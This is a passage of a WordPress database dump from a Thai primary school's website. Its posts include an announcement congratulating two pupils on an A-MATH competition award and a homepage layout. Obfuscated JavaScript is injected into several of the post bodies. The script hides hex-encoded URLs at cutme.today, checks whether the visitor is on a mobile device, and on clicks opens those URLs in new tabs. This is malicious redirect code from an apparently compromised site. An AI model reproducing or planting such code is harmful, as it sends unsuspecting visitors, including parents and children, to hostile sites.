)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ขอแสดงความยินดี กับ เด็กชายณัฐพงศ์ วงษ์เศษ และเด็กชายกฤษกร คำภูทอน ที่ได้รับ รางวัลรองชนะเลิศอันดับ กิจกรรมฝึกคิดพิชิตสมอง ท้าประลอง A-MATH จัดขึ้นโดย สำนักงานเขตพื้นที่การศึกษาศรีสะเกษ เขต 1','','publish','closed','closed','','%e0%b8%82%e0%b8%ad%e0%b9%81%e0%b8%aa%e0%b8%94%e0%b8%87%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5-%e0%b8%81%e0%b8%b1%e0%b8%9a-%e0%b9%80%e0%b8%94%e0%b9%87%e0%b8%81','','','2024-07-27 10:38:36','2024-07-27 03:38:36','',0,'http://pakhaeng.ssk.in.th/?p=37',0,'post','',0),
(38,1,'2024-07-27 10:38:30','2024-07-27 03:38:30','','453076658_992854945965510_707218750599466906_n','','inherit','','closed','','453076658_992854945965510_707218750599466906_n','','','2024-07-27 10:38:30','2024-07-27 03:38:30','',37,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/453076658_992854945965510_707218750599466906_n.jpg',0,'attachment','image/jpeg',0),
(39,1,'2024-07-27 10:38:34','2024-07-27 03:38:34','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid0Pq8iceG2253xBP9jpBqVEcspyAZ9ngcyJ9AYWdkAkZyLyFfzVE4wn1gWAmjfuEBSl&show_text=true&width=500\" width=\"500\" height=\"722\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ขอแสดงความยินดี กับ เด็กชายณัฐพงศ์ วงษ์เศษ และเด็กชายกฤษกร คำภูทอน ที่ได้รับ รางวัลรองชนะเลิศอันดับ กิจกรรมฝึกคิดพิชิตสมอง ท้าประลอง A-MATH จัดขึ้นโดย สำนักงานเขตพื้นที่การศึกษาศรีสะเกษ เขต 1','','inherit','closed','closed','','37-revision-v1','','','2024-07-27 10:38:34','2024-07-27 03:38:34','',37,'http://pakhaeng.ssk.in.th/?p=39',0,'revision','',0),
(41,1,'2024-07-27 10:41:24','2024-07-27 03:41:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"14c8uvh8\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":26}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 